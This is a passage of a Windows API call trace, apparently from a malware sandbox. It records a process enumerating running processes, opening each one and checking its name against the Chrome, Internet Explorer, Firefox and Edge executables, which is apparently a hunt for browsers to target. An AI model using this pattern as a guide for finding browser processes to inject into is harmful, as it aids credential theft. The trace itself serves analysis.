	[0232.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.970] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.970] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6ef8
	[0232.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.971] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0232.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.972] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.972] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0232.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.972] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6efc
	[0232.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.973] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0232.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.974] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.974] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0232.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.975] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6f00
	[0232.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.976] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0232.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.976] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.976] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0232.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.977] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6f04
	[0232.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.978] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.978] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.978] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.979] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6f08
	[0232.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.980] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.980] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.980] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.981] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.981] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6f0c
	[0232.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.982] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.982] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.982] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.983] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6f10
	[0232.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.984] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.984] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.985] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.985] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.985] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6f14
	[0232.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.986] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.987] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.987] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.987] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.988] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6f18
	[0232.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.988] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.989] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.989] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.990] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6f1c
	[0232.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.991] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.991] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.991] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.992] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6f20
	[0232.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.993] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.993] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.994] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.994] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6f24
	[0232.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.995] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0232.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.995] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.996] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0232.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.996] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6f28
	[0232.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.997] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.998] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.998] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6f2c
	[0232.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.999] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.000] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.000] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.000] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6f30
	[0233.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.002] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.002] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.003] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.003] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6f34
	[0233.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.004] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.005] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.005] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.006] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.006] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6f38
	[0233.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.007] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.008] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.008] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.009] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0233.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6f3c
	[0233.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.010] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0233.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.011] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.011] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0233.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.011] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0233.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6f40
	[0233.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.012] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.013] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.013] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.013] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0233.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6f44
	[0233.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.014] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0233.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.015] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.015] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0233.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.015] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0233.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0233.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0233.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6f48
	[0233.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.017] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0233.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.018] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0233.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0233.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6f4c
	[0233.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.021] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0233.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.021] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.021] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0233.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.022] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0233.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6f50
	[0233.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.023] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0233.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.023] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0233.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0233.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6f54
	[0233.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.025] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0233.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.025] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0233.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
